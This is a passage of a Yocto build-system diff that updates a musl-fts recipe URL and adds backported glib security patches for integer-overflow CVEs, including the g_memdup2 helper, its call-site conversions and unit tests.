SUMMARY = "Implementation of ftsfor musl libc packages"
HOMEPAGE = "https://github.com/pullmoll/musl-fts"
+DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
SECTION = "libs"
SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
-SRC_URI = "git://github.com/pullmoll/musl-fts.git"
+SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
new file mode 100644
index 0000000000..17dcada613
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
@@ -0,0 +1,41 @@
+From 63c5b62f0a984fac9a9700b12f54fe878e016a5d Mon Sep 17 00:00:00 2001
+From: Philip Withnall <withnall@endlessm.com>
+Date: Wed, 2 Sep 2020 12:38:09 +0100
+Subject: [PATCH] goption: Add a precondition to avoid GOptionEntry list
+ overflow
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If the calling code adds more option entries than `G_MAXSIZE` then
+there’ll be an integer overflow. This seems vanishingly unlikely (given
+that all callers use static option entry lists), but add a precondition
+anyway.
+
+Signed-off-by: Philip Withnall <withnall@endlessm.com>
+
+Fixes: #2197
+---
+ glib/goption.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+CVE: CVE-2020-35457
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/glib/-/commit/63c5b62f0a984fac9a9700b12f54fe878e016a5d]
+Comment: adjusted offset by -5 to fix patch fuzz warning
+
+diff --git a/glib/goption.c b/glib/goption.c
+index 9f5b977c4..bb9093a33 100644
+--- a/glib/goption.c
++++ b/glib/goption.c
+@@ -2417,6 +2417,8 @@ g_option_group_add_entries (GOptionGroup *group,
+
+ for (n_entries = 0; entries[n_entries].long_name != NULL; n_entries++) ;
+
++ g_return_if_fail (n_entries <= G_MAXSIZE - group->n_entries);
++
+ group->entries = g_renew (GOptionEntry, group->entries, group->n_entries + n_entries);
+
+ /* group->entries could be NULL in the trivial case where we add no
+--
+2.20.1
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
+Backport of:
+
+From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
+From: Krzesimir Nowak <qdlacz@gmail.com>
+Date: Wed, 10 Feb 2021 23:51:07 +0100
+Subject: [PATCH] gbytearray: Do not accept too large byte arrays
+
+GByteArray uses guint for storing the length of the byte array, but it
+also has a constructor (g_byte_array_new_take) that takes length as a
+gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
+for guint). It is possible to call the function with a value greater
+than G_MAXUINT, which will result in silent length truncation. This
+may happen as a result of unreffing GBytes into GByteArray, so rather
+be loud about it.
+
+(Test case tweaked by Philip Withnall.)
+
+(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
+`g_memdup2()`.)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27218
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/garray.c | 6 ++++++
+ glib/gbytes.c | 4 ++++
+ glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
+ 3 files changed, 44 insertions(+), 1 deletion(-)
+
+--- a/glib/garray.c
++++ b/glib/garray.c
+@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
+ * Create byte array containing the data. The data will be owned by the array
+ * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
+ *
++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
++ * stores the length of its data in #guint, which may be shorter than
++ * #gsize.
++ *
+ * Since: 2.32
+ *
+ * Returns: (transfer full): a new #GByteArray
+@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
+ GByteArray *array;
+ GRealArray *real;
+
++ g_return_val_if_fail (len <= G_MAXUINT, NULL);
++
+ array = g_byte_array_new ();
+ real = (GRealArray *)array;
+ g_assert (real->data == NULL);
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
+ * other cases the data is copied.
+ *
++ * Do not use it if @bytes contains more than %G_MAXUINT
++ * bytes. #GByteArray stores the length of its data in #guint, which
++ * may be shorter than #gsize, that @bytes is using.
++ *
+ * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
+ *
+ * Since: 2.32
+--- a/glib/tests/bytes.c
++++ b/glib/tests/bytes.c
+@@ -10,12 +10,12 @@
+ */
+
+ #undef G_DISABLE_ASSERT
+-#undef G_LOG_DOMAIN
+
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+ #include "glib.h"
++#include "glib/gstrfuncsprivate.h"
+
+ /* Keep in sync with glib/gbytes.c */
+ struct _GBytes
+@@ -334,6 +334,38 @@ test_to_array_transferred (void)
+ }
+
+ static void
++test_to_array_transferred_oversize (void)
++{
++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
++ "G_MAXUINT in length; test that longer ones are rejected");
++
++ if (sizeof (guint) >= sizeof (gsize))
++ {
++ g_test_skip ("Skipping test as guint is not smaller than gsize");
++ }
++ else if (g_test_undefined ())
++ {
++ GByteArray *array = NULL;
++ GBytes *bytes = NULL;
++ gpointer data = g_memdup2 (NYAN, N_NYAN);
++ gsize len = ((gsize) G_MAXUINT) + 1;
++
++ bytes = g_bytes_new_take (data, len);
++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
++ g_test_assert_expected_messages ();
++ g_assert_null (array);
++
++ g_free (data);
++ }
++ else
++ {
++ g_test_skip ("Skipping test as testing undefined behaviour is disabled");
++ }
++}
++
++static void
+ test_to_array_two_refs (void)
+ {
+ gconstpointer memory;
+@@ -410,6 +442,7 @@ main (int argc, char *argv[])
+ g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
+ g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
+ g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
+ g_test_add_func ("/bytes/null", test_null);
+
+ return g_test_run ();
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
+Backport of:
+
+From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:30:52 +0000
+Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This will replace the existing `g_memdup()` function for use within
+GLib. It has an unavoidable security flaw of taking its `byte_size`
+argument as a `guint` rather than as a `gsize`. Most callers will
+expect it to be a `gsize`, and may pass in large values which could
+silently be truncated, resulting in an undersize allocation compared
+to what the caller expects.
+
+This could lead to a classic buffer overflow vulnerability for many
+callers of `g_memdup()`.
+
+`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
+
+Spotted by Kevin Backhouse of GHSL.
+
+In GLib 2.68, `g_memdup2()` will be a new public API. In this version
+for backport to older stable releases, it’s a new `static inline` API
+in a private header, so that use of `g_memdup()` within GLib can be
+fixed without adding a new API in a stable release series.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ docs/reference/glib/meson.build | 1 +
+ glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++
+ glib/meson.build | 1 +
+ glib/tests/strfuncs.c | 23 ++++++++++++++
+ 4 files changed, 80 insertions(+)
+ create mode 100644 glib/gstrfuncsprivate.h
+
+--- a/docs/reference/glib/meson.build
++++ b/docs/reference/glib/meson.build
+@@ -22,6 +22,7 @@ if get_option('gtk_doc')
+ 'gprintfint.h',
+ 'gmirroringtable.h',
+ 'gscripttable.h',
++ 'gstrfuncsprivate.h',
+ 'glib-mirroring-tab',
+ 'gnulib',
+ 'pcre',
+--- /dev/null
++++ b/glib/gstrfuncsprivate.h
+@@ -0,0 +1,55 @@
++/* GLIB - Library of useful routines for C programming
++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
++ *
++ * This library is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU Lesser General Public
++ * License as published by the Free Software Foundation; either
++ * version 2.1 of the License, or (at your option) any later version.
++ *
++ * This library is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * Lesser General Public License for more details.
++ *
++ * You should have received a copy of the GNU Lesser General Public
++ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <glib.h>
++#include <string.h>
++
++/*
++ * g_memdup2:
++ * @mem: (nullable): the memory to copy.
++ * @byte_size: the number of bytes to copy.
++ *
++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
++ * from @mem. If @mem is %NULL it returns %NULL.
++ *
++ * This replaces g_memdup(), which was prone to integer overflows when
++ * converting the argument from a #gsize to a #guint.
++ *
++ * This static inline version is a backport of the new public API from
++ * GLib 2.68, kept internal to GLib for backport to older stable releases.
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
++ *
++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
++ * or %NULL if @mem is %NULL.
++ * Since: 2.68
++ */
++static inline gpointer
++g_memdup2 (gconstpointer mem,
++ gsize byte_size)
++{
++ gpointer new_mem;
++
++ if (mem && byte_size != 0)
++ {
++ new_mem = g_malloc (byte_size);
++ memcpy (new_mem, mem, byte_size);
++ }
++ else
++ new_mem = NULL;
++
++ return new_mem;
++}
+--- a/glib/meson.build
++++ b/glib/meson.build
+@@ -268,6 +268,7 @@ glib_sources = files(
+ 'gslist.c',
+ 'gstdio.c',
+ 'gstrfuncs.c',
++ 'gstrfuncsprivate.h',
+ 'gstring.c',
+ 'gstringchunk.c',
+ 'gtestutils.c',
+--- a/glib/tests/strfuncs.c
++++ b/glib/tests/strfuncs.c
+@@ -32,6 +32,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ #if defined (_MSC_VER) && (_MSC_VER <= 1800)
+ #define isnan(x) _isnan(x)
+
+@@ -219,6 +221,26 @@ test_memdup (void)
+ g_free (str_dup);
+ }
+
++/* Testing g_memdup2() function with various positive and negative cases */
++static void
++test_memdup2 (void)
++{
++ gchar *str_dup = NULL;
++ const gchar *str = "The quick brown fox jumps over the lazy dog";
++
++ /* Testing negative cases */
++ g_assert_null (g_memdup2 (NULL, 1024));
++ g_assert_null (g_memdup2 (str, 0));
++ g_assert_null (g_memdup2 (NULL, 0));
++
++ /* Testing normal usage cases */
++ str_dup = g_memdup2 (str, strlen (str) + 1);
++ g_assert_nonnull (str_dup);
++ g_assert_cmpstr (str, ==, str_dup);
++
++ g_free (str_dup);
++}
++
+ /* Testing g_strpcpy() function with various positive and negative cases */
+ static void
+ test_stpcpy (void)
+@@ -2523,6 +2545,7 @@ main (int argc,
+ g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
+ g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
+ g_test_add_func ("/strfuncs/memdup", test_memdup);
++ g_test_add_func ("/strfuncs/memdup2", test_memdup2);
+ g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
+ g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
+ g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
+From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:37:56 +0000
+Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdbusconnection.c | 5 +++--
+ gio/gdbusinterfaceskeleton.c | 3 ++-
+ gio/gfile.c | 7 ++++---
+ gio/gsettingsschema.c | 5 +++--
+ gio/gwin32registrykey.c | 8 +++++---
+ gio/tests/async-close-output-stream.c | 6 ++++--
+ gio/tests/gdbus-export.c | 5 +++--
+ gio/win32/gwinhttpfile.c | 9 +++++----
+ 8 files changed, 29 insertions(+), 19 deletions(-)
+
+--- a/gio/gdbusconnection.c
++++ b/gio/gdbusconnection.c
+@@ -110,6 +110,7 @@
+ #include "gasyncinitable.h"
+ #include "giostream.h"
+ #include "gasyncresult.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gmarshal-internal.h"
+
+@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+--- a/gio/gdbusinterfaceskeleton.c
++++ b/gio/gdbusinterfaceskeleton.c
+@@ -28,6 +28,7 @@
+ #include "gdbusmethodinvocation.h"
+ #include "gdbusconnection.h"
+ #include "gmarshal-internal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gioerror.h"
+
+@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
+ * properly before building the hooked_vtable, so we create it
+ * once at the last minute.
+ */
+- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
+ interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
+ }
+
+--- a/gio/gfile.c
++++ b/gio/gfile.c
+@@ -60,6 +60,7 @@
+ #include "gasyncresult.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+
+ /**
+@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
+ g_main_context_invoke_full (g_task_get_context (task),
+ g_task_get_priority (task),
+ measure_disk_usage_invoke_progress,
+- g_memdup (&progress, sizeof progress),
++ g_memdup2 (&progress, sizeof progress),
+ g_free);
+ }
+
+@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
+ data->progress_callback ? measure_disk_usage_progress : NULL, task,
+ &result.disk_usage, &result.num_dirs, &result.num_files,
+ &error))
+- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
+ else
+ g_task_return_error (task, error);
+ }
+@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
+
+ task = g_task_new (file, cancellable, callback, user_data);
+ g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
+- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
+ g_task_set_priority (task, io_priority);
+
+ g_task_run_in_thread (task, measure_disk_usage_thread);
+--- a/gio/gsettingsschema.c
++++ b/gio/gsettingsschema.c
+@@ -20,6 +20,7 @@
+
+ #include "gsettingsschema-internal.h"
+ #include "gsettings.h"
++#include "gstrfuncsprivate.h"
+
+ #include "gvdb/gvdb-reader.h"
+ #include "strinfo.c"
+@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
+
+ if (g_str_has_suffix (key, "/"))
+ {
+- gint length = strlen (key);
++ gsize length = strlen (key);
+
+- strv[j] = g_memdup (key, length);
++ strv[j] = g_memdup2 (key, length);
+ strv[j][length - 1] = '\0';
+ j++;
+ }
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -28,6 +28,8 @@
+ #include <ntstatus.h>
+ #include <winternl.h>
+
++#include "gstrfuncsprivate.h"
++
+ #ifndef _WDMDDK_
+ typedef enum _KEY_INFORMATION_CLASS {
+ KeyBasicInformation,
+@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_name_size = iter->value_name_size;
+
+ if (iter->value_data != NULL)
+- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
+
+ new_iter->value_data_size = iter->value_data_size;
+
+@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
+
+ if (iter->value_data_expanded_u8 != NULL)
+- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
+- iter->value_data_expanded_charsize);
++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
++ iter->value_data_expanded_charsize);
+
+ new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
+
+--- a/gio/tests/async-close-output-stream.c
++++ b/gio/tests/async-close-output-stream.c
+@@ -24,6 +24,8 @@
+ #include <stdlib.h>
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ #define DATA_TO_WRITE "Hello world\n"
+
+ typedef struct
+@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
+
+ data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
+
+- g_assert_cmpint (data->expected_size, >, 0);
++ g_assert_cmpuint (data->expected_size, >, 0);
+
+- data->expected_output = g_memdup (written, (guint)data->expected_size);
++ data->expected_output = g_memdup2 (written, data->expected_size);
+
+ /* then recreate the streams and prepare them for the asynchronous close */
+ destroy_streams (data);
+--- a/gio/tests/gdbus-export.c
++++ b/gio/tests/gdbus-export.c
+@@ -23,6 +23,7 @@
+ #include <string.h>
+
+ #include "gdbus-tests.h"
++#include "gstrfuncsprivate.h"
+
+ /* all tests rely on a shared mainloop */
+ static GMainLoop *loop = NULL;
+@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
+ g_assert_not_reached ();
+ }
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
+ {
+ const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -29,6 +29,7 @@
+ #include "gio/gfile.h"
+ #include "gio/gfileattribute.h"
+ #include "gio/gfileinfo.h"
++#include "gstrfuncsprivate.h"
+ #include "gwinhttpfile.h"
+ #include "gwinhttpfileinputstream.h"
+ #include "gwinhttpfileoutputstream.h"
+@@ -393,10 +394,10 @@
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
+From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:39:25 +0000
+Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
+ obvious places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gobject/gsignal.c | 3 ++-
+ gobject/gtype.c | 9 +++++----
+ gobject/gtypemodule.c | 3 ++-
+ gobject/tests/param.c | 4 +++-
+ 4 files changed, 12 insertions(+), 7 deletions(-)
+
+--- a/gobject/gsignal.c
++++ b/gobject/gsignal.c
+@@ -28,6 +28,7 @@
+ #include <signal.h>
+
+ #include "gsignal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtype-private.h"
+ #include "gbsearcharray.h"
+ #include "gvaluecollector.h"
+@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal
+ node->single_va_closure_is_valid = FALSE;
+ node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
+ node->n_params = n_params;
+- node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
+ node->return_type = return_type;
+ node->class_closure_bsa = NULL;
+ if (accumulator)
+--- a/gobject/gtype.c
++++ b/gobject/gtype.c
+@@ -33,6 +33,7 @@
+
+ #include "glib-private.h"
+ #include "gconstructor.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ #include <windows.h>
+@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
+ iholder->next = iface_node_get_holders_L (iface);
+ iface_node_set_holders_W (iface, iholder);
+ iholder->instance_type = NODE_TYPE (node);
+- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
+ iholder->plugin = plugin;
+
+ /* create an iface entry for this type */
+@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
+ INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
+
+ check_interface_info_I (iface, instance_type, &tmp_info);
+- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
+ }
+
+ return iholder; /* we don't modify write lock upon returning NULL */
+@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
+ IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
+
+ if (pentry)
+- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
+ }
+ if (!vtable)
+- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
+ entry->vtable = vtable;
+ vtable->g_type = NODE_TYPE (iface);
+ vtable->g_instance_type = NODE_TYPE (node);
+--- a/gobject/gtypemodule.c
++++ b/gobject/gtypemodule.c
+@@ -19,6 +19,7 @@
+
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
+ #include "gtypeplugin.h"
+ #include "gtypemodule.h"
+
+@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
+ module_type_info->loaded = TRUE;
+ module_type_info->info = *type_info;
+ if (type_info->value_table)
+- module_type_info->info.value_table = g_memdup (type_info->value_table,
++ module_type_info->info.value_table = g_memdup2 (type_info->value_table,
+ sizeof (GTypeValueTable));
+
+ return module_type_info->type;
+--- a/gobject/tests/param.c
++++ b/gobject/tests/param.c
+@@ -2,6 +2,8 @@
+ #include <glib-object.h>
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
++
+ static void
+ test_param_value (void)
+ {
+@@ -874,7 +876,7 @@ main (int argc, char *argv[])
+ test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
+ data.change_this_flag, data.change_this_type,
+ data.use_this_flag, data.use_this_type);
+- test_data = g_memdup (&data, sizeof (TestParamImplementData));
++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
+ g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
+ g_free (test_path);
+ }
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
+Backport of:
+
+From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:41:21 +0000
+Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()` or an existing `gsize`
+variable), so that they use `g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it
+
+In particular, this fixes an overflow within `g_bytes_new()`, identified
